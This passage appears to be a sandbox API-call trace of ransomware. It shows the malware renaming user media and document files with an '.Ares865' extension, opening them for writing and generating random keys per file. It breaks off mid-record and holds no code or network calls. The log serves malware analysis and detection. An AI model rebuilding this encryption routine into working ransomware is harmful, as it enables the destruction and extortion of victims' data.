(in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\cbSsZK4HFXH0NDh.bmp.Ares865") returned 74 [0107.941] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\cbSsZK4HFXH0NDh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\cbsszk4hfxh0ndh.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\cbSsZK4HFXH0NDh.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\cbsszk4hfxh0ndh.bmp.ares865"), dwFlags=0x1) returned 1 [0107.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\cbSsZK4HFXH0NDh.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\cbsszk4hfxh0ndh.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.943] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35486) returned 1 [0107.944] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.944] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.944] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.945] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.946] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.946] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.948] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\CNGQLjAz7s.jpg.Ares865") returned 69 [0107.948] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\CNGQLjAz7s.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\cngqljaz7s.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\CNGQLjAz7s.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\cngqljaz7s.jpg.ares865"), dwFlags=0x1) returned 1 [0107.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\CNGQLjAz7s.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\cngqljaz7s.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.950] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52238) returned 1 [0107.950] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.951] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.951] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.952] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.953] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.953] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.955] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\D0Qh2z.mp4.Ares865") returned 65 [0107.955] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\D0Qh2z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\d0qh2z.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\D0Qh2z.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\d0qh2z.mp4.ares865"), dwFlags=0x1) returned 1 [0107.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\D0Qh2z.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\d0qh2z.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.958] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51817) returned 1 [0107.958] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.959] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.959] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.960] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.961] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.961] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.963] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\dt yAo3cNSf05bH Cx.wav.Ares865") returned 77 [0107.963] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\dt yAo3cNSf05bH Cx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\dt yao3cnsf05bh cx.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\dt yAo3cNSf05bH Cx.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\dt yao3cnsf05bh cx.wav.ares865"), dwFlags=0x1) returned 1 [0107.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\dt yAo3cNSf05bH Cx.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\dt yao3cnsf05bh cx.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.965] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=91526) returned 1 [0107.965] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.966] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.966] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.969] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.970] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.970] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.972] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\GQ4zc9V.png.Ares865") returned 66 [0107.972] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\GQ4zc9V.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\gq4zc9v.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\GQ4zc9V.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\gq4zc9v.png.ares865"), dwFlags=0x1) returned 1 [0107.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\GQ4zc9V.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\gq4zc9v.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.974] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=58660) returned 1 [0107.974] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.975] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.975] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.977] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.977] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.977] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.980] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\HUKQ53rp0zW6.png.Ares865") returned 71 [0107.980] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\HUKQ53rp0zW6.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\hukq53rp0zw6.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\HUKQ53rp0zW6.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\hukq53rp0zw6.png.ares865"), dwFlags=0x1) returned 1 [0107.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\HUKQ53rp0zW6.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\hukq53rp0zw6.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.982] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=69523) returned 1 [0107.982] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.983] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.983] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.985] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.986] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.986] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.988] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\k6UG-T Dnf_9VJ.jpg.Ares865") returned 73 [0107.988] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\k6UG-T Dnf_9VJ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\k6ug-t dnf_9vj.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\k6UG-T Dnf_9VJ.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\k6ug-t dnf_9vj.jpg.ares865"), dwFlags=0x1) returned 1 [0107.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\k6UG-T Dnf_9VJ.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\k6ug-t dnf_9vj.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.990] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15296) returned 1 [0107.990] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.991] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.991] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.992] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.992] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.992] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.994] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\LEuxzM9RptD5X-.mkv.Ares865") returned 73 [0107.994] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\LEuxzM9RptD5X-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\leuxzm9rptd5x-.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\LEuxzM9RptD5X-.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\leuxzm9rptd5x-.mkv.ares865"), dwFlags=0x1) returned 1 [0107.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\LEuxzM9RptD5X-.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\leuxzm9rptd5x-.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.996] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41374) returned 1 [0107.996] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.997] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.997] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.998] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.999] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.999] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.001] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\LZ2RCElVo7ukMe1fhw.gif.Ares865") returned 77 [0108.001] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\LZ2RCElVo7ukMe1fhw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\lz2rcelvo7ukme1fhw.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\LZ2RCElVo7ukMe1fhw.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\lz2rcelvo7ukme1fhw.gif.ares865"), dwFlags=0x1) returned 1 [0108.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\LZ2RCElVo7ukMe1fhw.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\lz2rcelvo7ukme1fhw.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.003] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25739) returned 1 [0108.003] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.003] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.004] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.004] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.005] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.005] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\mK9Bg0VlcdrDwlMnTZNj.m4a.Ares865") returned 79 [0108.007] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\mK9Bg0VlcdrDwlMnTZNj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mk9bg0vlcdrdwlmntznj.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\mK9Bg0VlcdrDwlMnTZNj.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mk9bg0vlcdrdwlmntznj.m4a.ares865"), dwFlags=0x1) returned 1 [0108.008] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\mK9Bg0VlcdrDwlMnTZNj.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mk9bg0vlcdrdwlmntznj.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35236) returned 1 [0108.009] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.010] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.010] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.011] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.012] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.012] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.013] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\N20EdPwmwAh0he1.gif.Ares865") returned 74 [0108.014] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\N20EdPwmwAh0he1.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\n20edpwmwah0he1.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\N20EdPwmwAh0he1.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\n20edpwmwah0he1.gif.ares865"), dwFlags=0x1) returned 1 [0108.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\N20EdPwmwAh0he1.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\n20edpwmwah0he1.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.015] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5881) returned 1 [0108.016] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.016] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.016] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.017] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.017] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.018] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.019] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\nlDdqSbyzuPBd6.m4a.Ares865") returned 73 [0108.019] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\nlDdqSbyzuPBd6.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\nlddqsbyzupbd6.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\nlDdqSbyzuPBd6.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\nlddqsbyzupbd6.m4a.ares865"), dwFlags=0x1) returned 1 [0108.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\nlDdqSbyzuPBd6.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\nlddqsbyzupbd6.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.021] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14098) returned 1 [0108.021] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.022] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.022] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.023] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.023] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.023] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.025] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\PVCkl1oeDfzyAB--.docx.Ares865") returned 76 [0108.025] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\PVCkl1oeDfzyAB--.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\pvckl1oedfzyab--.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\PVCkl1oeDfzyAB--.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\pvckl1oedfzyab--.docx.ares865"), dwFlags=0x1) returned 1 [0108.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\PVCkl1oeDfzyAB--.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\pvckl1oedfzyab--.docx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.027] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83559) returned 1 [0108.027] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.028] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.028] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.030] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.031] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.031] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\qnBiFq1.gif.Ares865") returned 66 [0108.033] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\qnBiFq1.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\qnbifq1.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\qnBiFq1.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\qnbifq1.gif.ares865"), dwFlags=0x1) returned 1 [0108.034] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\qnBiFq1.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\qnbifq1.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.035] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=61276) returned 1 [0108.035] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.036] 